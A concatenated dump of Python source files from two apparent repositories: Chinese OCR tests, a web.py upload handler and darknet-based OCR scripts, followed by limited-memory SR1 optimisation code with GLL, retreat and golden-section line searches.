                            ['都', '会', '对', '应', '着', '一', '个', '账', '户', '一', '―', '这', '个', '账'],
                            ['户', '可', '以', '是', '信', '用', '卡', '账', '户', '、', '借', '记', '卡', '账'],
                            ['户', ',', '也', '包', '括', '邮', '局', '汇', '款', '、', '手', '机', '代'],
                            ['收', '、', '电', '话', '代', '收', '、', '预', '付', '费', '卡', '和', '点', '卡'],
                            ['等', '多', '种', '形', '式', '。']]),
    ('multi-line_cn2.png', [['。', '当', '然', ',', '在', '媒', '介', '越', '来', '越', '多', '的', '情', '形', '下', ','],
                            ['意', '味', '着', '传', '播', '方', '式', '的', '变', '化', '。', '过', '去', '主', '流'],
                            ['的', '是', '大', '众', '传', '播', ',', '现', '在', '互', '动', '性', '和', '定', '制'],
                            ['性', '带', '来', '了', '新', '的', '挑', '战', '—', '—', '如', '何', '让', '品', '牌'],
                            ['与', '消', '费', '者', '更', '加', '互', '动', '。']]),
]
CASES = SINGLE_LINE_CASES + MULTIPLE_LINE_CASES
@pytest.mark.parametrize('img_fp, expected', CASES)
def test_ocr(img_fp, expected):
    # CnOcr.ocr must accept all three input types — file path, mx NDArray,
    # and numpy array — and produce the same prediction for each.
    ocr = CNOCR
    root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    img_fp = os.path.join(root_dir, 'examples', img_fp)
    pred = ocr.ocr(img_fp)
    print('\n')
    print("Predicted Chars:", pred)
    assert expected == pred
    img = mx.image.imread(img_fp, 1)
    pred = ocr.ocr(img)
    print("Predicted Chars:", pred)
    assert expected == pred
    img = mx.image.imread(img_fp, 1).asnumpy()
    pred = ocr.ocr(img)
    print("Predicted Chars:", pred)
    assert expected == pred
@pytest.mark.parametrize('img_fp, expected', SINGLE_LINE_CASES)
def test_ocr_for_single_line(img_fp, expected):
    """ocr_for_single_line() must accept a path, an NDArray, a 3-channel
    numpy array, a 2-D grayscale array and an HxWx1 array equally."""
    ocr = CNOCR
    root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    img_fp = os.path.join(root_dir, 'examples', img_fp)

    def _check(candidate):
        # One prediction round against the single expected line.
        pred = ocr.ocr_for_single_line(candidate)
        print("Predicted Chars:", pred)
        assert expected[0] == pred

    print('\n')
    _check(img_fp)                              # file path
    _check(mx.image.imread(img_fp, 1))          # mx.nd.NDArray
    img = mx.image.imread(img_fp, 1).asnumpy()  # HxWx3 numpy array
    _check(img)
    gray = np.array(Image.fromarray(img).convert('L'))
    assert len(gray.shape) == 2                 # HxW grayscale
    _check(gray)
    single_channel = np.expand_dims(gray, axis=2)
    assert len(single_channel.shape) == 3 and single_channel.shape[2] == 1
    _check(single_channel)                      # HxWx1
@pytest.mark.parametrize('img_fp, expected', MULTIPLE_LINE_CASES)
def test_ocr_for_single_lines(img_fp, expected):
    """Split a multi-line image into line images and OCR them as one batch,
    both as numpy arrays and as mx.nd.NDArrays."""
    ocr = CNOCR
    root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    img_fp = os.path.join(root_dir, 'examples', img_fp)
    img = mx.image.imread(img_fp, 1).asnumpy()
    # line_split yields (line_image, meta) pairs; only the images are needed.
    line_img_list = [pair[0] for pair in line_split(img, blank=True)]
    pred = ocr.ocr_for_single_lines(line_img_list)
    print('\n')
    print("Predicted Chars:", pred)
    assert expected == pred
    # The same batch wrapped as NDArrays must produce identical output.
    nd_batch = [nd.array(line_img) for line_img in line_img_list]
    pred = ocr.ocr_for_single_lines(nd_batch)
    print("Predicted Chars:", pred)
    assert expected == pred
--- FILE SEPARATOR ---
# coding: utf-8
import os
import sys
import mxnet as mx
import numpy as np
from mxnet import nd
import pytest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.insert(1, os.path.dirname(os.path.abspath(__file__)))
def test_nd():
    """mx.nd.array must stack nested numpy data into the expected shapes."""
    base = np.arange(2 * 3).reshape(2, 3)
    # A singleton list adds a leading batch axis.
    stacked = nd.array([base])
    assert stacked.shape == (1, 2, 3)
    # Two matrices stack into a (2, 2, 3) tensor.
    stacked = nd.array([base, base + 10])
    assert stacked.shape == (2, 2, 3)
    print(stacked)
--- FILE SEPARATOR ---
# Standard library
import gc
import json
import os

# Third-party
import numpy as np
import web

# Project
from cnocr import CnOcr
urls = ('/upload', 'Upload')
class Upload:
    """web.py handler: GET serves a minimal upload form, POST stores the
    uploaded file and returns the OCR result as a JSON string."""

    def GET(self):
        """Render a multipart upload form."""
        return """<html><head></head><body>
<form method="POST" enctype="multipart/form-data" action="">
<input type="file" name="myfile" />
<br/>
<input type="submit" />
</form>
</body></html>"""

    def POST(self):
        """Save the uploaded file, OCR it, and return the result as JSON.

        Returns None (empty response) when no file field is present,
        matching the original fall-through behavior.
        """
        x = web.input(myfile={})
        filedir = './upload_file'  # change this to the directory you want to store the file in.
        if 'myfile' not in x:  # no file-object was created for this request
            return
        # Normalize windows-style separators, then keep only the basename
        # so a crafted filename cannot escape the upload directory.
        filename = x.myfile.filename.replace('\\', '/').split('/')[-1]
        os.makedirs(filedir, exist_ok=True)  # fix: dir did not have to exist before
        filepath = os.path.join(filedir, filename)
        # 'with' guarantees the handle is closed even if the write fails
        # (the original leaked the handle on exceptions).
        with open(filepath, 'wb') as fout:
            fout.write(x.myfile.file.read())
        myOcr = CnOcr()
        resultData = myOcr.ocr(filepath)
        del myOcr
        gc.collect()  # release the model's memory before the next request
        return json.dumps(resultData, cls=NumpyEncoder)
class NumpyEncoder(json.JSONEncoder):
    """JSON encoder that understands numpy scalars and arrays.

    Defined BEFORE the __main__ guard: app.run() blocks forever, so in the
    original module this class (placed after the guard) was never defined
    when running as a script, and POST crashed with NameError.
    """

    def default(self, obj):
        # np.integer / np.floating are the abstract bases of every concrete
        # sized type (np.int32, np.float64, ...) and, unlike aliases such as
        # np.float_ / np.int_, still exist under NumPy 2.0.
        if isinstance(obj, np.integer):
            return int(obj)
        if isinstance(obj, np.floating):
            return float(obj)
        if isinstance(obj, np.ndarray):
            return obj.tolist()
        return json.JSONEncoder.default(self, obj)


if __name__ == "__main__":
    app = web.application(urls, globals())
    app.run()
--- FILE SEPARATOR ---
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
config

Paths and tuning knobs for the darknet-based OCR pipeline.

@author: chineseocr
"""
ocrPath = 'models/ocr.weights'  # recognition (CRNN/CTC) model weights
textPath = 'models/text.weights'  # text-line detection model weights
darkRoot ='../darknet/libdarknet.so' ## darknet shared library (GPU path)
TEXT_LINE_SCORE=0.85## text-line probability threshold; boxes below it are dropped
scale = 600## detection input scale; adjustable at runtime, independent of text.cfg height/width
maxScale = 900  # upper bound for the detection input scale
GPU=False ## True: darknet on GPU; False: opencv.dnn on CPU
anchors = '16,11, 16,16, 16,23, 16,33, 16,48, 16,68, 16,97, 16,139, 16,198, 16,283'  # detector anchor (w,h) pairs
--- FILE SEPARATOR ---
import cv2
import time
import numpy as np
from PIL import Image
from keys import characters
from config import ocrPath,GPU
# Label set used by decode(): the character table padded with one extra slot
# on each side (the last two indexes are treated as blanks by decode()).
charactersPred = ' '+characters+' '
if GPU:
    # GPU path would use darknet directly; not implemented in this module.
    pass
else:
    # CPU path: load the darknet model through OpenCV's DNN module.  The
    # network .cfg is assumed to sit next to the .weights file.
    net = cv2.dnn.readNetFromDarknet(ocrPath.replace('weights','cfg'),ocrPath)
def predict_cpu(image):
    """Run the CNN+CTC OCR network on a PIL image (CPU / OpenCV-DNN path).

    The image is rescaled to height 32 (width kept proportional), converted
    to a normalized grayscale tensor, forwarded through `net`, and decoded
    to a text string.
    """
    target_h = 32
    ratio = image.size[1] * 1.0 / target_h
    target_w = int(image.size[0] / ratio)
    resized = image.resize((target_w, target_h), Image.BILINEAR)
    # Grayscale, scaled to [0, 1], then normalized to roughly [-1, 1].
    arr = (np.array(resized.convert('L')) / 255.0 - 0.5) / 0.5
    batch = np.array([[arr]])  # shape: 1 x 1 x H x W
    net.setInput(batch)
    outputs = net.forward(net.getUnconnectedOutLayersNames())
    scores = outputs[0][0, :, -1, :]
    return decode(scores)
def decode(pred):
    """Greedy CTC decoding: argmax per step, drop blanks and repeats.

    The last two indexes of charactersPred act as blank labels.
    """
    best_path = pred.argmax(axis=0)
    blank_ids = {len(charactersPred) - 1, len(charactersPred) - 2}
    chars = []
    prev = None
    for idx in best_path:
        # Keep a symbol only if it is not a blank and differs from the
        # previous step (collapses CTC repeats).
        if idx not in blank_ids and idx != prev:
            chars.append(charactersPred[idx])
        prev = idx
    return ''.join(chars)
if __name__=='__main__':
    # BUG FIX: this module defines predict_cpu(), not predict(); the original
    # call raised NameError at runtime.
    t =time.time()
    img=Image.open('./13.jpg')
    res = predict_cpu(img)
    print(time.time()-t,res)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
@author: chineseocr
"""
import web
web.config.debug = False
import uuid
import json
import os
import sys
import time
import cv2
import numpy as np
from helper.image import read_url_img,base64_to_PIL,get_now
from PIL import Image
from dnn.text import detect_lines
from config import scale,maxScale,TEXT_LINE_SCORE
import json
render = web.template.render('templates', base='base')
billList =[]
root = './test/'
timeOutTime=5
def job(imgPath):
    """Detect text-line boxes in the image stored at *imgPath*.

    Returns:
        dict: {'data': [...], 'errCode': 0} on success — each entry holds the
        integer 'box' coordinates, the rounded detection 'prob', and
        'text': None (recognition happens elsewhere); or
        {'data': [], 'errCode': 3} when the image cannot be loaded.
    """
    # Image.open never returns None — it raises on a bad path or corrupt
    # file — so the original `if img is not None` error branch was
    # unreachable.  Catch the load failure instead so errCode 3 is actually
    # reported (broad Exception on purpose: any load problem maps to 3).
    try:
        img = Image.open(imgPath)
        image = np.array(img)
    except Exception:
        return {'data': [], 'errCode': 3}
    image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
    boxes, scores = detect_lines(image, scale=scale, maxScale=maxScale)
    data = []
    for box, prob in zip(boxes, scores):
        if prob > TEXT_LINE_SCORE:
            data.append({'box': [int(x) for x in box],
                         'prob': round(float(prob), 2),
                         'text': None})
    return {'data': data, 'errCode': 0}
# CLI entry: run detection on the image path given as the first argument and
# print the result as a JSON document on stdout.
result=job(sys.argv[1])
print(json.dumps(result))
|
[
"/cnocr/cnocr/__init__.py",
"/cnocr/cnocr/cn_ocr.py",
"/cnocr/cnocr/consts.py",
"/cnocr/cnocr/fit/fit.py",
"/cnocr/cnocr/utils.py",
"/cnocr/scripts/cnocr_train.py",
"/cnocr/tests/test_cnocr.py",
"/cnocr/tests/test_mxnet.py",
"/cnocr/upload.py",
"/darknet-ocr/config.py",
"/darknet-ocr/dnn/ocr.py",
"/darknet-ocr/region.py"
] |
0000duck/Optimization-Theory-and-Methods
|
import numpy as np
import Line_Search.exact_line_search as ELS
import Line_Search.inexact_line_search as ILS
from Line_Search.GLL import GLL_search
import Newton_Methods.fletcher_freeman as FF
import Newton_Methods.newton_method as nm
from goto import with_goto
import logging
import functions
import copy
import time
import utils
from queue import Queue
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
"""
We note, however, that
limited-memory SR1 updating is sometimes not as effective as L-BFGS updating because it
may not produce positive definite approximations near a solution.
即相比于BFGS,SR1要慢很多
"""
@with_goto
def CLSR1(X, func, gfunc, hyper_parameters=None, M = 15, search_mode="ELS", epsilon=1e-5, max_epoch=1000):
    """Limited-memory SR1 method in compact (compressed) form.

    Args:
        X (np.array): initial point.
        func (callable): objective function.
        gfunc (callable): gradient of the objective.
        hyper_parameters (dict, optional): when given, overrides the keyword
            arguments below; expects keys "LSR1"->"M", "search_mode",
            "epsilon", "max_epoch", plus the sub-configs used by the chosen
            line search and by the modified Cholesky fallback.
        M (int, optional): number of recent (s, y) pairs kept for the compact
            update of Hk; expected values are 5 / 9 / 15. Defaults to 15.
        search_mode (str, optional): line-search mode, one of
            ['ELS', 'ILS', 'GLL']. Defaults to 'ELS'.
        epsilon (float, optional): stop when ||g_k|| < epsilon * max(1, ||x_k||).
            Defaults to 1e-5.
        max_epoch (int, optional): maximum number of iterations. Defaults to 1000.

    Returns:
        (X_new, func_X_new, k, function_k, elapsed_seconds)
    """
    if hyper_parameters is not None:
        M = hyper_parameters["LSR1"]["M"]
        search_mode = hyper_parameters["search_mode"]
        epsilon = hyper_parameters["epsilon"]
        max_epoch = hyper_parameters["max_epoch"]
    n = len(X)
    k = 1
    function_k = 0
    func_values = [] # function value of every step; used by the GLL search
    mk = 0 # initial m(k) for the GLL search
    Sk_que = Queue() # at most M recent s_k vectors, used by the LSR1 update of Hk
    Yk_que = Queue() # at most M recent y_k vectors, used by the LSR1 update of Hk
    Dk_que = Queue() # at most M recent scalars s^T * y
    g = gfunc(X)
    F = func(X)
    function_k += 1
    func_values.append(F)
    start_time = time.time()
    # Compute the descent direction d_k: rebuild Hk through the compact-form
    # update, then d_k = -Hk * g_k.
    label .count_dk
    # if len(p_history) > 0:
    #     mu = ((s_history[-1] @ y_history[-1])/ (y_history[-1] @ y_history[-1]))
    # else:
    #     mu = 1
    Hk = np.eye(n, dtype=float)
    item_num = min(Sk_que.qsize(), M)
    if item_num > 0:
        Sk = np.mat(Sk_que.queue).T
        Yk = np.mat(Yk_que.queue).T
        Lk = np.zeros((item_num, item_num), dtype=float)
        for i in range(item_num):
            for j in range(i):
                Lk[i][j] = Sk_que.queue[i] @ Yk_que.queue[j]
        Dk = np.diag(Dk_que.queue)
        mid_mat = Dk + Lk + Lk.T - (Yk.T @ Hk @ Yk)
        try:
            # The middle matrix of the compact update may be singular.
            mid_mat_inv = np.linalg.inv(mid_mat)
        except:
            logger.info("修正Hk时,中间的矩阵不可逆,用修正Cholesky分解")
            L, D = utils.modified_Cholesky(mid_mat, hyper_parameters["modified_Cholesky"])
            mid_mat_ = utils.get_modified_G(L, D)
            mid_mat_inv = np.linalg.inv(mid_mat_)
        Hk = Hk + (Sk - Hk @ Yk) @ mid_mat_inv @ (Sk - Hk @ Yk).T
    d = np.squeeze(np.array(-Hk @ g))
    before_LS_time = time.time()
    # With the descent direction in hand, the remaining steps are the same as
    # in the other optimizers: line search, step, history update, stop check.
    if search_mode == "ELS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
        a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
        alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
        add_func_k = add_retreat_func + add_golden_func
    elif search_mode == "ILS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
        alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
    elif search_mode == "GLL":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
        alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
    logger.info("当前更新的步长为{}".format(alpha_star))
    X_new = X + d * alpha_star
    function_k = function_k + add_func_k + 1
    func_X_new = func(X_new)
    func_values.append(func_X_new)
    g_new = gfunc(X_new)
    # History is full: drop the oldest (s, y, s^T y) triple before pushing.
    if item_num == M:
        Sk_que.get()
        Yk_que.get()
        Dk_que.get()
    Sk_que.put(d * alpha_star)
    Yk_que.put(g_new - g)
    Dk_que.put((d * alpha_star) @ (g_new - g))
    # Update bookkeeping / report progress.
    logging.info("g is {}".format(g_new))
    logger.info("g的范数为{g},epsilon * max(1, |x_k|)为{xk}".format(g = np.linalg.norm(g_new), xk = epsilon * max(1, np.linalg.norm(X_new))))
    # NOTE(review): the stopping rule may be fragile — with floating-point
    # rounding the decrease of g can be exactly 0, so downstream ratio
    # computations risk dividing by zero.
    # NOTE(review): the termination log message says "BFGS" but this routine
    # implements the limited-memory SR1 method.
    if np.linalg.norm(g_new) < epsilon * max(1, np.linalg.norm(X_new)):
        # if abs(func_X_new - F) <= epsilon:
        end_time = time.time()
        logger.info("因为满足终止条件,{mode}的有限内存BFGS方法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
        return X_new, func_X_new, k, function_k, end_time-start_time
    if k > max_epoch:
        end_time = time.time()
        logger.info("超过最大迭代次数,{mode}的有限内存BFGS方法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
        return X_new, func_X_new, k, function_k, end_time-start_time
    X = X_new
    g = g_new
    F = func_X_new
    k += 1
    goto .count_dk
if __name__ == '__main__':
    # Benchmark driver: runs the compact LSR1 method on a set of test
    # functions with M in {5, 9, 15}.  All experiments except the
    # Extended_Freudenstein_Roth run are currently commented out; the
    # commented code is kept verbatim so it can be re-enabled as-is.
    CRITERION = ["Armijo Goldstein", "Wolfe Powell", "Strong Wolfe Powell"]
    ILS_criterion = CRITERION[0]
    # Hyper-parameter presets for the three line-search modes.
    ELS_LSR1_hyper_parameters = {
        "ELS": {
            "retreat_method": {
                "a0" : 1,
                "r": 1e-7,
                "t": 5,
            },
            "golden_method": {
                "epsilon": 1e-7,
            }
        },
        "LSR1": {
            "M": 15,
        },
        "modified_Cholesky": {
            "u": 1e-50,
        },
        "search_mode": "ELS",
        "epsilon": 1e-5,
        "max_epoch": 1000,
    }
    ILS_LSR1_hyper_parameters = {
        "ILS": {
            "rho": 0.2,
            "sigma": 0.4,
            "t": 1.5,
            "alpha0": 1e-6,
            "criterion": ILS_criterion
        },
        "GM_newton": {
            "zeta": 1e-8,
        },
        "modified_Cholesky": {
            "u": 1e-50,
        },
        "LSR1": {
            "M": 15,
        },
        "search_mode": "ILS",
        "epsilon": 1e-5,
        "max_epoch": 1000,
    }
    GLL_LSR1_hyper_parameters = {
        "GLL": {
            "rho": 0.25,
            "sigma": 0.4,
            "M": 3,
            "a": 1,
        },
        "modified_Cholesky": {
            "u": 1e-50,
        },
        "LSR1": {
            "M": 15,
        },
        "search_mode": "GLL",
        "epsilon": 1e-5,
        "max_epoch": 1000,
    }
    M = [5, 9, 15]
    N = 1000
    for n in [N]:
        # logger.info("Penalty1 函数")
        # x0 = np.array(range(1, n + 1))
        # penalty1 = functions.Penalty1(n)
        # ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[0]
        # logger.info("M={}的LSR1法".format(M[0]))
        # X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, penalty1.func, penalty1.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
        # logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[0], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[1]
        # logger.info("M={}的LSR1法".format(M[1]))
        # X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, penalty1.func, penalty1.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
        # logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[1], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[2]
        # logger.info("M={}的LSR1法".format(M[2]))
        # X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, penalty1.func, penalty1.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
        # logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[2], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        logger.info("Extended_Freudenstein_Roth 函数")
        x0 = np.array([-2.] * n)
        EFR = functions.Extended_Freudenstein_Roth(n)
        ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[0]
        logger.info("M={}的LSR1法".format(M[0]))
        X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, EFR.func, EFR.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
        logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[0], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[1]
        # logger.info("M={}的LSR1法".format(M[1]))
        # X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, EFR.func, EFR.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
        # logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[1], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[2]
        # logger.info("M={}的LSR1法".format(M[2]))
        # X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, EFR.func, EFR.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
        # logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[2], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # logger.info("Extended_Rosenbrock 函数")
        # ER = functions.Extended_Rosenbrock(n)
        # x0 = np.zeros(n)
        # t = np.array(range(int(n / 2)))
        # x0[2 * t] = -1.2
        # x0[2 * t + 1] = 1
        # ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[0]
        # logger.info("M={}的LSR1法".format(M[0]))
        # X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, ER.func, ER.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
        # logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[0], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[1]
        # logger.info("M={}的LSR1法".format(M[1]))
        # X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, ER.func, ER.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
        # logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[1], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[2]
        # logger.info("M={}的LSR1法".format(M[2]))
        # X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, ER.func, ER.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
        # logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[2], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # logger.info("Trigonometric 函数")
        # x0 = np.array([1/n] * int(n))
        # f_funciton = functions.trigonometric
        # g_function = functions.g_trigonometric
        # G_function = functions.G_trigonometric
        # ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[0]
        # logger.info("M={}的LSR1法".format(M[0]))
        # X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, f_funciton, g_function, hyper_parameters=ILS_LSR1_hyper_parameters)
        # logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[0], format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[1]
        # logger.info("M={}的LSR1法".format(M[1]))
        # X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, f_funciton, g_function, hyper_parameters=GLL_LSR1_hyper_parameters)
        # logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[1], format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
--- FILE SEPARATOR ---
from goto import with_goto
def GLL_search(func, gfunc, X, d, func_values, last_m, hyper_parameters=None, M=10, a=10**5, sigma=0.5, rho=0.5):
    """Nonmonotone (GLL) line search.

    Accepts the first trial step alpha = sigma**h * a (h = 0, 1, ...) with
        f(X + alpha*d) <= max of the last m(k) function values
                          + rho * alpha * g_k^T d.

    Args:
        func (callable): objective function.
        gfunc (callable): gradient of the objective.
        X (np.array): current point.
        d (np.array): descent direction.
        func_values (list): function values of the previous steps.
        last_m (int): m(k-1), history length used at the previous iteration.
        hyper_parameters (dict, optional): overrides for rho/sigma/M/a.
        M (int, optional): upper bound on m(k). Defaults to 10.
        a (float, optional): base (largest) trial step. Defaults to 10**5.
        sigma (float, optional): backtracking factor in (0, 1). Defaults to 0.5.
        rho (float, optional): sufficient-decrease coefficient. Defaults to 0.5.

    Returns:
        (alpha, func_k, mk): accepted step, number of func evaluations, new m(k).
    """
    if hyper_parameters is not None:
        rho = hyper_parameters["rho"]
        sigma = hyper_parameters["sigma"]
        M = hyper_parameters["M"]
        a = hyper_parameters["a"]
    # History length grows by one each iteration, capped at M.
    mk = min(last_m + 1, M)
    slope = gfunc(X).dot(d)            # g_k^T d; expected negative
    reference = max(func_values[-mk:]) # worst of the recent history
    calls = 0
    hk = 0
    while True:
        trial = sigma ** hk * a
        calls += 1
        if func(X + trial * d) <= reference + rho * trial * slope:
            return trial, calls, mk
        hk += 1
--- FILE SEPARATOR ---
import numpy as np
from goto import with_goto
import copy
import functions
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logger = logging.getLogger(__name__)
@with_goto
def retreat_method(func, X, d, hyper_parameters=None, a0=1e-4, r=1e-5, t=1.5):
    """Forward-backward (advance-and-retreat) method for bracketing an
    initial step-size interval for exact line search.
    Ref: Gao Li, "Numerical Optimization Methods", p. 26.

    Args:
        func (callable): objective function.
        X (np.array): current point.
        d (np.array): descent direction.
        a0 (float): initial step size.
        hyper_parameters (dict, optional): may override:
            r (float): probe increment for the next step size.
            t (float): magnification factor, must be > 1.

    Returns:
        (lower, upper, func_k): bracketing interval endpoints and the number
        of function evaluations.  A degenerate interval (a_pre, a_pre) is
        returned when neither direction decreases the function.
    """
    if hyper_parameters is not None:
        r = hyper_parameters["r"]
        t = hyper_parameters["t"]
    # Step 1: validate parameters and initialize the probe state.
    assert a0 >=0 and r > 0 and t > 1, "must have a0 >=0 , r > 0 , t > 1"
    i = 0
    alpha = a0
    a_pre = a0
    just_change_direction_flag = False
    func_k = 1
    func_pre = func(X + d * a_pre)
    # Step 2: probe the next step a_pre + r.
    label .step2
    a_cur = a_pre + r
    if a_cur <= 0:
        # Probe crossed zero: clamp and settle the interval.
        # NOTE(review): on this path func_cur still holds the value from the
        # previous probe when step 4 falls into its else branch — confirm
        # this is intended.
        a_cur = 0
        goto .step4
    func_k += 1
    func_cur = func(X + d * a_cur)
    if func_pre <= func_cur:
        # The function stopped decreasing; it can happen that neither
        # direction is a descent direction.
        if just_change_direction_flag:
            logger.info("在精确线搜索中,两个方向均是不是下降方向")
            return a_pre, a_pre, func_k
        # go to step 4
        goto .step4
    # Step 3: still decreasing — advance with a magnified increment.
    r = t * r
    alpha = a_pre
    a_pre = a_cur
    func_pre = func_cur
    i += 1
    goto .step2
    label .step4
    if i == 0:
        # Very first probe already failed: flip the search direction once
        # and retry from step 2.
        r = -r
        alpha = a_cur
        just_change_direction_flag = True
        # back to step 2
        goto .step2
    else:
        return min(alpha, a_cur), max(alpha, a_cur), func_k
def golden_method(func, X, d, a0, b0, hyper_parameters=None, epsilon=1e-5, tau=0.618):
    """Golden-section (0.618) search for an approximate minimizer of
    phi(alpha) = func(X + alpha * d) on [a0, b0].
    Ref: Yuan Ya-xiang, "Optimization Theory and Methods", p. 71.

    Args:
        func (callable): objective function.
        X (np.array): current point.
        d (np.array): search direction.
        a0 (float): lower bound of the step interval.
        b0 (float): upper bound of the step interval.
        hyper_parameters (dict, optional): may override epsilon.
        epsilon (float): interval-width stopping threshold.
        tau (float): golden-section constant 0.618.

    Returns:
        (alpha, func_k): the chosen step and the number of func evaluations.
    """
    if hyper_parameters is not None:
        epsilon = hyper_parameters["epsilon"]
    if a0 == b0:
        # Degenerate interval: nothing to search.
        return a0, 0
    assert b0 > a0 and epsilon > 0, "must have b0 > a0, epsilon > 0"
    lo, hi = a0, b0
    # Two interior probes at the golden-section points.
    left = lo + (1 - tau) * (hi - lo)
    right = lo + tau * (hi - lo)
    func_k = 2
    f_left = func(X + d * left)
    f_right = func(X + d * right)
    # Iterative form of the original goto loop (step2/step3/step4): shrink
    # the bracket from whichever side the larger probe value rules out,
    # reusing the surviving probe so only one new evaluation per round.
    while True:
        if f_left <= f_right:
            # Minimum lies in [lo, right]: shrink from the right.
            if right - lo <= epsilon:
                return left, func_k
            hi = right
            right, f_right = left, f_left
            left = lo + (1 - tau) * (hi - lo)
            func_k += 1
            f_left = func(X + d * left)
        else:
            # Minimum lies in [left, hi]: shrink from the left.
            if hi - left <= epsilon:
                return right, func_k
            lo = left
            left, f_left = right, f_right
            right = lo + tau * (hi - lo)
            func_k += 1
            f_right = func(X + d * right)
--- FILE SEPARATOR ---
import numpy as np
